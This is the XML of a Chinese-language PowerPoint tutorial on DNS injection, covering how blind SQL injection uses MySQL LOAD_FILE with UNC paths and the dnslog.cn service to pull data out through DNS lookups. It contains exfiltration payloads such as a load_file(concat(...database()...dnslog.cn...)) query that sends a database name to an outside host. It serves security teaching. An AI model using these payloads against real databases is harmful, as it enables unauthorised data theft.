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heme/theme3.xml" ContentType="application/vnd.openxmlformats-officedocument.them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1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88" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="290" r:id="rId6"/>
    <p:sldId id="291" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="292" r:id="rId9"/>
    <p:sldId id="295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10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7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9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92.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag97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1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag106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9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8.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12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74320" y="321260"/>
            <a:ext cx="11683455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9490237" y="321259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61015" y="2411670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9471025" y="6254750"/>
            <a:ext cx="180022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750570" y="6305550"/>
            <a:ext cx="71564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555115" y="6306820"/>
            <a:ext cx="88900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731010" y="6306820"/>
            <a:ext cx="253365" cy="762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883644" y="809127"/>
            <a:ext cx="9144000" cy="1896745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660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883643" y="3017520"/>
            <a:ext cx="9144000" cy="890270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883644" y="5050433"/>
            <a:ext cx="3365430" cy="579657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2023-3-17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2023-3-17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\\servername\sharename\directory\filename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>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注入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435" y="-29845"/>
            <a:ext cx="12295505" cy="69176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DNSLOG</a:t>
            </a:r>
            <a:r>
              <a:t>使用场景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69925" y="1389380"/>
            <a:ext cx="1136586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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在某些无法直接利用漏洞获得回显的情况下，但是目标可以发起请求，这个时候就可以通过DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>把想获得的数据外带出来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对于sql盲注，常见的方法就是二分法去一个个猜，但是这样的方法麻烦不说，还很容易因为数据请求频繁导致被ban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所以可以将select到的数据发送给一个url，利用dns解析产生的记录日志来查看数据</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="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52124"/>
            <a:ext cx="10852237" cy="441964"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNSLOG</a:t>
            </a:r>
            <a:r>
              <a:t>解析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3280" y="1080721"/>
            <a:ext cx="1123505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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LOAD_FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取文件的函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>       读取文件并返回文件内容为字符串。要使用此函数，文件必须位于服务器主机上，必须指定完整路径的文件，而且必须有FILE权限。 该文件所有字节可读，但文件内容必须小于max_allowed_packet（限制server接受的数据包大小函数，默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。 如果该文件不存在或无法读取，因为前面的条件之一不满足，函数返回 NULL。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US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  <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个功能不是默认开启的，需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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配置文件加一句 secure_file_priv=</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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60" y="2878455"/>
            <a:ext cx="6268085" cy="21342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3280" y="5998845"/>
            <a:ext cx="7353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注意：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路径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DNSLOG</a:t>
            </a:r>
            <a:r>
              <a:t>的函数解析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04595"/>
            <a:ext cx="10852150" cy="1005205"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>需要了解下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNC</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UNC路径  通用命名规则，也称通用命名规范、通用命名约定。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69925" y="2334895"/>
            <a:ext cx="11200765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什么是UNC路径？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UNC路径就是类似\\softer这样的形式的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网络路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。它符合 \\servername\sharename 格式，其中 servername 是服务器名，sharename 是共享资源的名称。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目录或文件的 UNC 名称可以包括共享名称下的目录路径，格式为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\servername\sharename\directory\filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\Pc-m\bbb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例如softer计算机的名为it168的共享文件夹，用UNC表示就是\\softer\it168。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我们熟悉的命令行访问法访问网上邻居，实际上应该称作UNC路径访问法。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不过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径也可以这样写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>servername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sharename   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>强烈建议这样写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  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23033" y="6430308"/>
            <a:ext cx="1024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4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//a.1806dl.dnslog.cn/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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访问</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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1806dl.dnslog.cn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下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err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abc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共享文件夹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DNSLOG.CN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9925" y="1134110"/>
            <a:ext cx="10608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http://dnslog.cn/ 免费的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dnslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>平台   不用注册 不用登陆 不采集任何信息 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>美滋滋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>               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5" y="1624330"/>
            <a:ext cx="8778240" cy="3378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9925" y="5328920"/>
            <a:ext cx="111506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点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Get SubDomain  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>给你一个二级域名让你使用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Refresh Record  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看给你的那个二级域名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解析情况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DNSLOG</a:t>
            </a:r>
            <a:r>
              <a:t>的函数解析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3435" y="1075055"/>
            <a:ext cx="10258425" cy="1543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3435" y="3061970"/>
            <a:ext cx="5351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中间的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一个子查询，所以这条语句就等同于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13435" y="3566160"/>
            <a:ext cx="109918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SELECT LOAD_FILE('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>//error.1806dl.dnslog.cn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>');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13435" y="4323080"/>
            <a:ext cx="97161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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库去访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>error.1806dl.dnslog.cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的服务器下的共享文件夹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1806dl.dnslog.cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的子域名的解析都是在某台服务器，然后他记录下来了有人请求访问了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>error.1806dl.dnslog.cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，然后在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DnsLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个平台上面显示出来了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13435" y="2532380"/>
            <a:ext cx="10566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select load_file(concat('//',database(),'.pbqbt4.dnslog.cn/123'))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ABD19-279D-A0BC-920A-6E07BE37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E817D56-08CE-C4A0-1C7D-9C687CCE2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44" y="2479433"/>
            <a:ext cx="11683911" cy="242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259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k4MjUyMjQ0ODBiNDZkYmVjYTAyMmJmNmI2NTg5ZD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691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691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691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691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691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6915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604033972"/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:2430,&quot;width&quot;:16155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471</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>47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楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>1_Office 主题​​</vt:lpstr>
      <vt:lpstr>DNS注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>DNSLOG使用场景</vt:lpstr>
      <vt:lpstr>DNSLOG解析</vt:lpstr>
      <vt:lpstr>DNSLOG的函数解析</vt:lpstr>
      <vt:lpstr>DNSLOG.CN</vt:lpstr>
      <vt:lpstr>DNSLOG的函数解析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DNS注入</dc:title>
  <dc:creator>M</dc:creator>
  <cp:lastModifiedBy>root</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-19T05:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-17T01:12:47Z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B355BAA0CE1C45C78D6913404AE31E47</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.11830</vt:lpwstr>
  </property>
</Properties>
</file>